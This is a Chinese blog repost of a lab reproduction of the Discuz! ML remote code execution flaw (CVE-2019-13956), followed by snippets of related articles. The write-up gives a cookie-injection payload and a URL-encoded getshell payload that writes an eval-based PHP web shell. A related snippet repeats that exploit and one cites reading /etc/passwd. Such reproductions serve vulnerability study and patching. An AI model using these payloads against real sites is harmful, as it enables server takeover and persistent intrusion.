Discuz! ML远程代码执行(CVE-2019-13956)

最新推荐文章于 2022-10-13 18:38:58 发布
最新推荐文章于 2022-10-13 18:38:58 发布
阅读量444 收藏
点赞数
原文链接:http://www.cnblogs.com/yuzly/p/11386755.html
版权

Discuz! ML远程代码执行(CVE-2019-13956)

一、漏洞描述

该漏洞存在discuz ml(多国语言版)中,cookie中的language可控并且没有严格过滤,导致可以远程代码执行。

二、漏洞影响版本

Discuz! ML V3.2

Discuz! ML V3.3

Discuz! ML V3.4

三、漏洞环境搭建

1、 官网下载Discuz! ML V3.4,下载地址: http://discuz.ml/download

2、 将压缩包解压到phpstudy网站根目录,浏览器访问upload目录开始安装

  

3、然后就是一直点击下一步就可以了,直到完成安装

  

四、漏洞复现

1、漏洞存在的位置/upload/source/module/portal/portal_index.php,使用template函数处理’diy:portal/index’,然后使用include_once包含

  

2、跟进template函数,发现把DISCUZ_LANG函数拼接成为一个缓存文件名,然后又返回了缓存文件名

  

3、跟进DISCUZ_LANG函数,发现从cookie中取language的值给$lng

  

4、继续浏览代码,发现把$lng的值赋给DISCUZ_LANG了

  

5、到此为止,整个漏洞分析过程已结束,过程如下:

外部参数$lng(即cookie中的language语言)可控,导致DISCUZ_LANG函数获取$lng,然后拼接成缓存文件并且返回了缓存文件名,导致template函数生成的缓存文件名可控,插入自己的代码,最终include_once函数包含一下导致了代码注入(执行了插入恶意代码的缓存文件名)。

6、测试漏洞,随便点击一个页面,抓包,将Cookie中的xxx_language参数值改为’.phpinfo().’,发现成功执行了代码

  

7、查看缓存文件,发现缓存文件名被修改如下

  

8、getshell

8.1尝试上传一个shell,构造payload,如下:

'.file_put_contents('shell.php','<?php eval($_POST[cmd]);?>').'

执行提示错误,可能是编码的原因

  

8.2、尝试对payload进行全部编码,失败,只有使用如下payload才能成功

%27.+file_put_contents%28%27shell.php%27%2Curldecode%28%27%253c%253fphp+%2520eval%28%2524_%2550%254f%2553%2554%255b%2522cmd%2522%255d%29%253b%253f%253e%27%29%29.%27

  

8.3、查看是否成功上传shell.php,发现成功上传

  

8.4、菜刀连接

  

 

 

 

----------------------------------------------------------------------------------------

工具检测:https://github.com/theLSA/discuz-ml-rce

参考: https://mp.weixin.qq.com/s?__biz=MzU2NDc2NDYwMA==&mid=2247483944&idx=1&sn=ba9f6f99967e31fd56634f714d8ae650&scene=21#wechat_redirect

转载于:https://www.cnblogs.com/yuzly/p/11386755.html

WY92139010
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DiscuzML远程代码执行(CVE-2019-13956)
jklbnm12的博客
03-08 878
一、漏洞描述 该漏洞存在discuz ml(多国语言版)中,cookie中的language可控并且没有严格过滤,导致可以远程代码执行。 二、漏洞影响版本 Discuz! ML V3.2 Discuz! ML V3.3 Discuz! ML V3.4 三、漏洞环境搭建 官网下载Discuz! ML V3.4,下载地址: http://discuz.ml/download 将压缩包解压到phpstudy网站根目录,浏览器访问upload目录开始安装 然后就是一直点击下一步就可以了,直到完成安装 四
Discuz远程代码执行(CVE-2019-13956)
qq_51459600的博客
05-04 1841
Discuz! ML远程代码执行(CVE-2019-13956) 漏洞介绍: 该漏洞存在discuz ml(多国语言版)中,cookie中的language可控并且没有严格过滤,导致可以远程代码执行。 环境搭建: 靶机:CentOS7(10.10.10.137) docker环境下载: https://codeload.github.com/rhbb/CVE-2019-13956/zip/refs/heads/master 进入目录: docker-compuse up -d docker ps -a
Discuz ML! V3.X代码执行漏洞
cyzCc的博客
02-16 1273
Discuz ML! V3.X存在代码执行漏洞,攻击者通过精心构建的请求报文可以直接执行恶意的PHP代码,进一步可获取整个网站的服务器权限 【安鸾渗透实战平台】 靶场:http://whalwl.site:8042/forum.php 首先先用burp抓包,将抓到的数据包发送到Repeater,构造请求参数 在cookies里我们可以看到“CKxv_2132_language=sc”这个参数,...
CVE-2021-21985VMCenterSe远程代码执行
爱国小白帽
05-26 1007
报告编号:B6-2021-052602 报告来源:360CERT 报告作者:360CERT 更新日期:2021-05-26 1 漏洞简述 2021年05月26日,360CERT监测发现VMware官方发布了VMware vCenter Server远程代码执行漏洞的风险通告,该漏洞是由360 Noah Lab的安全研究员Ricter Z发现的。漏洞编号为CVE-2021-21985,漏洞等级:严重,漏洞评分:9.8。 VMware vCenter Server是VMware虚拟化管理平台,广泛的应用于企业私
CVE-2019-15642:Webmin远程执行代码(已认证)
03-10
CVE-2019-15642 Webmin远程执行代码(已认证) python用法: python CVE-2019-15642.py https://xxx.xxx.xxx:10000 "cat /etc/passwd" Webmin的0x01泊坞窗 cd ~/vulhub/webmin/CVE-2019-15107 docker-compose up -...
CVE-2019-0708:3389远程桌面代码执行扩展CVE-2019-0708批量检测工具(Rdpscan Bluekeep Check)
02-05
微软3389远程漏洞CVE-2019-0708批量检测工具 0x001 Win下检测 https://github.com/robertdavidgraham/rdpscan C:\Users\K8team\Desktop\rdpscan-master\vs10\Release 的目录 2019/06/02 02:11 <DIR> . 2019/06/02 02...
CVE-2019-11708:针对Windows 64位版本的Firefox的完整漏洞利用链(CVE-2019-11708和CVE-2019-9810)
02-04
它使用CVE-2019-9810在内容流程以及父流程中获取代码执行,并使用CVE-2019-11708诱骗父流程浏览到任意URL。 在过去的中,我已经介绍了CVE-2019-9810的根本原因和利用文章以及相关的。 CVE-2019-11708已由公告,并...
Discuz论坛源码
03-12
下载后解压到Wampserver的www目录下,运行upload/instll/index.php进行安装。进行到设置数据库密码等时,数据库密码为空(如wampserver内置MySQL设置有密码的,以自定义密码为准)
discuz安装_Discuz! ml RCE漏洞复现(自写EXP分享)
weixin_39946300的博客
12-28 910
# 000 前言大家好我是PANDA墨森,昨天公众号粉丝涨了一大波,首先感谢一下圈子社区的大力分享,也祝愿圈子社区能越办越好!今天的文章还是老样子,漏洞复现+自写EXP分享,脚本有需要的后台留言,也可以自行更改,话不多说,往下看#001 Discuz!ml简介:Discuz!ml是一套通用的社区论坛软件系统,用户可以在不需要任何编程的基础上,通过简单的设置和安装,在互联网上搭建起具备完善...
discuz程序php木马,discuzML 3.x代码执行漏洞的利用
weixin_39655993的博客
03-22 237
一、漏洞原因:Discuz!ML 系统对cookie中的l接收的language参数内容未过滤,导致字符串拼接,从而执行php代码。二、环境搭建Centos7 PHP5.6漏洞源码:链接:https://pan.baidu.com/s/1QFd8rdXn_Je6lOehSLTIWw提取码:5ka0http://discuz.ml/download三、复现利用环境搭建好了,我们访问下网站网站没有问题...
CVE-2018-8174(IE浏览器远程代码执行漏洞)
94小菜
11-29 790
漏洞描述: VBScript引擎处理内存中对象的方式中存在一个远程执行代码漏洞。该漏洞可能以一种攻击者可以在当前用户的上下文中执行任意代码的方式来破坏内存。成功利用此漏洞的攻击者可以获得与当前用户相同的用户权限。如果当前用户使用管理用户权限登录,则成功利用此漏洞的攻击者可以控制受影响的系统。然后,攻击者可能会安装程序。查看,更改或删除数据;或创建具有完全用户权限的新帐户。      在基于Web的攻击情形中,攻击者可能拥有一个旨在通过Internet Exp
discuzML 3.x代码执行漏洞的利用 笔记
边城浪子的博客
09-18 1349
服务器:windows 2003 攻击机:windows 10 搭建过程:下载discuzML 3.x源码 链接:https://pan.baidu.com/s/1QFd8rdXn_Je6lOehSLTIWw 提取码:5ka0 step1:在windows 2003中安装phpstudy step2:将源码中upload中的文件上传至phpstudy的www目录中。 step3:打...
Discuz! X 3.4 ML 任意代码执行漏洞复现
墙角睡大觉的专栏
07-13 3907
0X1 漏洞概述 2019年7月11日,网络上出现了一个DiscuzML远程代码执行漏洞的PoC,研究员验证分析发现,攻击者能够利用该漏洞在请求流量的cookie字段中(language参数)插入任意代码执行任意代码,从而实现完全远程接管整个服务器的目的,该漏洞利用方式简单,危害性较大。漏洞影响范围包括如下版本。 Discuz! ML v.3.4、Discuz! ML v.3.3、Discuz...
discuz mlv3.x命令注入
weixin_30820151的博客
07-15 191
    本次漏洞是由于Discuz! ML对于cookie字段的不恰当处理造成的cookie字段中的language参数未经过滤,直接被拼接希尔缓存文件中,而缓存文件随后被加载,造成代码执行。 共有60出利用点,下面前台index.php代码执行: 漏洞利用exp: %27.file_put_contents%28%27shell.php%27%2Curldecode%28%27%253...
【漏洞复现-Discuz-代码执行Discuz_CVE-2019-13956
最新发布
10-13 2236
Discuz-代码执行】可控,包含
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值